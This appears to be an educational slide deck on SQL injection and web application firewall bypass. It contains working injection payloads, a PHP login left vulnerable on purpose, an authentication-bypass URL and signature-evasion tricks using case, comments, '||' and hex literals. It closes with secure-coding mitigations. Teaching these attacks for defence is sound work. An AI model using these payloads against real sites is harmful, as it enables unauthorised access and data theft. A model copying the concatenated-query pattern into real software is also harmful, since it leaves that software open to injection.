All Ab0ut 0f SQL Injection and WAF Bypass Techniques
THATSANAI DETDAMRONGPREEECHA
COMPUTER SCIENCE @ KING MONGKUT'S INSTITUTE OF TECHNOLOGY LADKRABANG
What is SQL Injection?
SQL injection is a code injection attack.
It happens when user-supplied input is pasted into the text of a SQL statement, so the attacker can inject SQL fragments that change the query's conditions,
because the developer did not validate or parameterize the input before using it in the query.
Logical Conjunction and Disjunction table
SQL operators that matter for injection
And , &&          (conjunction)
Or , ||           (disjunction)
Like              (pattern match)
*                 (all columns, as in SELECT *)
( , )             (grouping; also the context an injection may have to close and reopen)
< , >             (comparison)
+, - , *, /, %    (arithmetic)
SQL Comment
end of the line
"#"       (MySQL only)
"--"      (standard; MySQL requires whitespace or a control character after it, so send "-- " or, in a URL, "--+")
"-- "
multiple line
/* */     (also usable inline between tokens on a single line)
Examples
vulnerability and inject command
sql command :
SELECT first_name, last_name FROM users WHERE user_id = '$id'
Inject code (the statements that result when $id is replaced by the attacker's input):
SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'
SELECT first_name, last_name FROM users WHERE user_id = 'am' or 'am'
SELECT first_name, last_name FROM users WHERE user_id = '' or '1'='1'
SELECT first_name, last_name FROM users WHERE user_id = '' or '2600'='2600'
SELECT first_name, last_name FROM users WHERE user_id = '' or 'HELLO' or 'HELLO'
SELECT first_name, last_name FROM users WHERE user_id = '' or 1 #'
SELECT first_name, last_name FROM users WHERE user_id = '' or true #'
Caveat: MySQL converts a bare string literal used as a condition to a number, so '1' is true but 'am' and 'HELLO' become 0 (false) and those two variants return no rows; use a digit string, a comparison such as '1'='1', or a bare 1 / true.
sql command :
SELECT first_name, last_name FROM users WHERE user_id = $id
Inject code (no quote is needed because the value is not quoted in the query):
true            (becomes WHERE user_id = true)
'1' or '1'      (becomes WHERE user_id = '1' or '1')
2 or 2          (becomes WHERE user_id = 2 or 2)
sql command :
SELECT first_name, last_name FROM users WHERE user_id = ($id)
Inject code (close the bracket first, then reopen it so the original closing bracket still matches):
1) or (1        (becomes WHERE user_id = (1) or (1))
2+3) or (5      (becomes WHERE user_id = (2+3) or (5))
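An added example, not part of the original slides, that runs the three quoting contexts above against an in-memory SQLite database standing in for MySQL. The table, its rows and the payload list are constructed here, and the `--` comment is used where the slides use MySQL's `#`, which SQLite does not recognise. It also exercises the 'am' case so the false-tautology caveat is visible.

```python
import sqlite3

# Query templates as the slides show them: the input is pasted into the SQL text.
TEMPLATES = {
    "quoted":  "SELECT first_name, last_name FROM users WHERE user_id = '{id}'",
    "numeric": "SELECT first_name, last_name FROM users WHERE user_id = {id}",
    "parens":  "SELECT first_name, last_name FROM users WHERE user_id = ({id})",
}

# Constructed sample rows (hypothetical data, not from the slides).
SAMPLE_USERS = [(1, "admin", "admin"), (2, "gordon", "brown"), (3, "hack", "me")]

# (context, payload, why it matters); the payloads follow the slides.
PAYLOADS = [
    ("quoted",  "1",           "intended use: exactly one row"),
    ("quoted",  "1' or '1",    "'1' converts to 1 in boolean context -> true"),
    ("quoted",  "am' or 'am",  "'am' converts to 0 -> false, no rows at all"),
    ("quoted",  "' or '1'='1", "classic tautology"),
    ("quoted",  "' or 1 -- ",  "comment swallows the closing quote"),
    ("numeric", "2 or 2",      "no quotes needed in a numeric context"),
    ("parens",  "1) or (1",    "close the bracket, then reopen it"),
    ("parens",  "2+3) or (5",  "arithmetic works as well"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, context, user_input):
    """Build the statement by string substitution, exactly as the vulnerable page
    does, and return how many rows come back (1 is the intended result)."""
    sql = TEMPLATES[context].format(id=user_input)
    return len(conn.execute(sql).fetchall())


def run_payloads(conn=None):
    """Run every payload and return {(context, payload): row_count}."""
    if conn is None:
        conn = make_db()
    return {(ctx, p): vulnerable_lookup(conn, ctx, p) for ctx, p, _ in PAYLOADS}


if __name__ == "__main__":
    conn = make_db()
    for ctx, payload, why in PAYLOADS:
        rows = vulnerable_lookup(conn, ctx, payload)
        print(f"{ctx:8} {payload!r:16} -> {rows} row(s)  ({why})")
```

Three rows instead of one means the condition was turned into a tautology; zero rows for the 'am' payload is the string-to-number conversion at work, and the same conversion happens in MySQL.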
http://cs.ssru.ac.th/cs01/mae/Pae/ตัวอย่างและโปรแกรมที่โหลดๆมา/Login_thaicreate/PHP MySQL กับLogin Form ทำระบบ User ล็อกอิน แบบง่าย ๆ ด้วย PHP และ MySQL โดยทำการตรวจสอบ Username และPassword.htm
http://www.santosh143.com/2013/05/how-to-create-loginregister-system.html
http://www.exploit-db.com/exploits/26405/
http://www.exploit-db.com/exploits/26416/
Example
<?php
// Vulnerable on purpose: the username is spliced straight into the SQL text.
// Only the password goes through md5(), so the username is the injection point.
$sql = "SELECT * FROM members WHERE password='".md5($_GET['password'])."' AND username='".$_GET['username']."'";
$result = mysql_query($sql, $db);   // legacy mysql_* API (removed in PHP 7)
if ($result === FALSE) {
    die('Invalid SQL query');
}
if (mysql_num_rows($result) == 1) {
    echo "Congrats, WIN!!!\n";
} else {
    echo "The number of rows is not 1\n";
}
?>
login_sqli1.php?password=whatever&username='+or+1=1+LIMIT+1#
The query becomes:
SELECT * FROM members WHERE password='<md5 of whatever>' AND username='' or 1=1 LIMIT 1#'
The OR makes the condition true for every row, LIMIT 1 keeps the row count at exactly 1 so the check passes, and # comments out the trailing quote. When sending the request from a browser, encode the # as %23, otherwise it is treated as a URL fragment and never reaches the server.
Impact
Read data from the database (tables, credentials, configuration)
Bypass authentication and gain access to the system
Etc. (modify or delete data, depending on the query and the database user's privileges)
Bypass Web Application Firewall
Techniques
What is a Web Application Firewall?
Web Application Firewall ( WAF )
Software or hardware
Focused on protecting the website
Inspects all data at the application layer (HTTP requests and responses)
Can detect and block attacks against the website, typically by matching requests against signatures
How to Bypass? Original
1' or '1'='1
union all select 1,2,3,4,5 -- 
union all select 1,2,@@version,4,5 -- 
Solution
1' oR '1'='1
uNIon AlL sELeCt 1,2,3,4,5 -- 
u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 -- 
SQL keywords are case-insensitive, so mixed case defeats a case-sensitive signature, and MySQL discards /* */ comments, so they can be dropped between tokens to break up a signature. Whether a comment placed inside a keyword still parses depends on the DBMS version, so verify it against the target.
How to Bypass? (cont.)
If the filter blocks or , and
Solve : Use || instead of or
Use && instead of and
(MySQL treats || as OR unless the PIPES_AS_CONCAT SQL mode is set; in most other DBMS || is string concatenation, so this trick is MySQL-specific.)
How to Bypass? (cont.)
If the filter blocks where
Solve : Use limit instead of where (LIMIT offset,1 picks out a single row without any condition)
If the filter blocks limit
Solve : Use group by and having instead of where (HAVING filters rows after grouping, so it can take the place of the condition)
How to Bypass? (cont.)
If the filter blocks whitespace
Solve : Use %0b instead of whitespace (vertical tab; MySQL also accepts %09, %0a, %0c, %0d and %a0 as separators, and /**/ works too)
If the filter blocks '
Solve : Use 0xXX , unhex(xx) instead of ' (0x61646d696e evaluates to 'admin' with no quote character at all). This replaces a quoted string literal inside the payload; the quote that closes the original string, such as the leading ' in 1' or ..., cannot be hex-encoded, so the trick is most useful in numeric contexts.
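An added example, not from the slides, that puts the bypass rules above against a toy blacklist filter written here (hypothetical and far simpler than a real WAF) and a small normaliser that approximates what MySQL's parser sees once comments, URL-encoding, hex literals and alternative whitespace are resolved. The rule set, payload pairs and whitespace list are the example's own assumptions; it generalises the slides by checking all five evasions in one run.

```python
import re
from urllib.parse import unquote

# Hypothetical toy WAF: a case-sensitive keyword blacklist applied to the raw,
# still URL-encoded parameter value.  Real WAFs are smarter, but the failure
# modes are the same in kind.
BLACKLIST = re.compile(r"union\s+(?:all\s+)?select|\bor\b|\band\b|\bwhere\b|'")

# Bytes the MySQL lexer accepts as token separators (tab, LF, VT, FF, CR, NBSP, space).
MYSQL_WS = re.compile(r"[\t\n\x0b\x0c\r\xa0 ]+")
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")

# (technique, payload the naive filter catches, equivalent payload it misses)
PAIRS = [
    ("case variation",
     "union all select 1,2,3,4,5 -- ",
     "uNIon AlL sELeCt 1,2,3,4,5 -- "),
    ("inline comments",
     "union all select 1,2,@@version,4,5 -- ",
     "u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 -- "),
    ("|| instead of or",
     "1 or 1=1",
     "1 || 1=1"),
    ("%0b instead of whitespace",
     "1 union select 1,2 -- ",
     "1%0bunion%0bselect%0b1,2%0b--%0b"),
    ("hex literal instead of a quoted string",
     "uNIon sELeCt 1,'admin',3 -- ",      # case already varied; only the quote rule is left
     "uNIon sELeCt 1,0x61646d696e,3 -- "),
]


def waf_blocks(raw_value):
    """True when the toy filter would reject the raw parameter value."""
    return BLACKLIST.search(raw_value) is not None


def normalize(raw_value):
    """Approximate the statement the database actually parses: URL-decode,
    drop /* */ comments, spell || and && as OR/AND, turn 0x.. into the string
    it encodes, treat every MySQL separator byte as one space, fold case."""
    s = unquote(raw_value)
    s = INLINE_COMMENT.sub("", s)
    s = s.replace("||", " or ").replace("&&", " and ")
    s = HEX_LITERAL.sub(lambda m: "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'", s)
    s = MYSQL_WS.sub(" ", s)
    return s.strip().lower()


def evaluate_pairs():
    """For each pair return (technique, original_blocked, evasion_blocked, same_meaning)."""
    results = []
    for technique, original, evasion in PAIRS:
        results.append((technique,
                        waf_blocks(original),
                        waf_blocks(evasion),
                        normalize(original) == normalize(evasion)))
    return results


if __name__ == "__main__":
    for technique, blocked_orig, blocked_evasion, same in evaluate_pairs():
        print(f"{technique:40} original blocked={blocked_orig}  "
              f"evasion blocked={blocked_evasion}  same query={same}")
```

The point of the normaliser is the defender's check: a filter that matches raw bytes sees five different strings, while the database sees the same statement five times. A filter that wants to keep up has to decode and normalise first, which is why keyword blacklists are a weak control and parameterised queries are the real fix.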
How to Mitigate
Top 5 Secure Coding Tips for PHP applications
1. Filter input data: validate everything from GET , POST and COOKIE against what the field is allowed to contain
2. Secure database queries: use prepared statements with bound parameters (mysqli or PDO) instead of string concatenation; escaping is a fallback, not the fix
3. Filter output data: htmlspecialchars()
htmlentities()
strip_tags()
strtr()
4. Error handling: log_errors = On
display_errors = Off (database errors go to the log, not to the attacker)
5. Prevent other injection attacks by applying the same rule to every other interpreter the application talks to: never build its input by concatenating untrusted data
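An added example, not from the slides and not the page's PHP, showing tip 2 in Python with SQLite: the login from the earlier PHP example, once built by concatenation and once with bound parameters, run against the same `' or 1=1 LIMIT 1` payload (with SQLite's `-- ` comment where the PHP example used MySQL's `#`). Table, rows and credentials are constructed; md5 is kept only to mirror the PHP and is not a suitable password hash.

```python
import hashlib
import sqlite3

# Constructed sample accounts (hypothetical); stored the way the PHP does: md5 hex.
MEMBERS = [("admin", "s3cret"), ("bob", "hunter2")]

# The slide's payload, with SQLite's -- comment in place of MySQL's #.
PAYLOAD = "' or 1=1 LIMIT 1 -- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)",
                     [(u, hashlib.md5(p.encode()).hexdigest()) for u, p in MEMBERS])
    return conn


def login_vulnerable(conn, username, password):
    """Mirror of the PHP: hash the password, then splice both values into the SQL text."""
    h = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT * FROM members WHERE password='" + h
           + "' AND username='" + username + "'")
    return len(conn.execute(sql).fetchall()) == 1


def login_safe(conn, username, password):
    """Same check with a constant SQL string; the values travel as bound parameters,
    so a quote in the username is data, never syntax."""
    h = hashlib.md5(password.encode()).hexdigest()
    sql = "SELECT * FROM members WHERE password=? AND username=?"
    return len(conn.execute(sql, (h, username)).fetchall()) == 1


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, injected :", login_vulnerable(conn, PAYLOAD, "whatever"))  # True
    print("safe, injected       :", login_safe(conn, PAYLOAD, "whatever"))        # False
    print("safe, real password  :", login_safe(conn, "admin", "s3cret"))          # True
```

In the vulnerable version the statement text changes with every request and `LIMIT 1 -- ` keeps the row count at exactly one; in the safe version the statement text never changes, the whole payload is compared against the username column as an ordinary string, and no row matches. The PHP equivalent is a `prepare()` / `bind_param()` (mysqli) or `prepare()` / `execute([...])` (PDO) pair built the same way.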
References and Appendix
www.owasp.org
http://palpapers.plynt.com/issues/2009Dec/secure-coding-php/
http://dev.mysql.com/doc/refman/5.0/en/non-typed-operators.html
http://thtutz.blogspot.com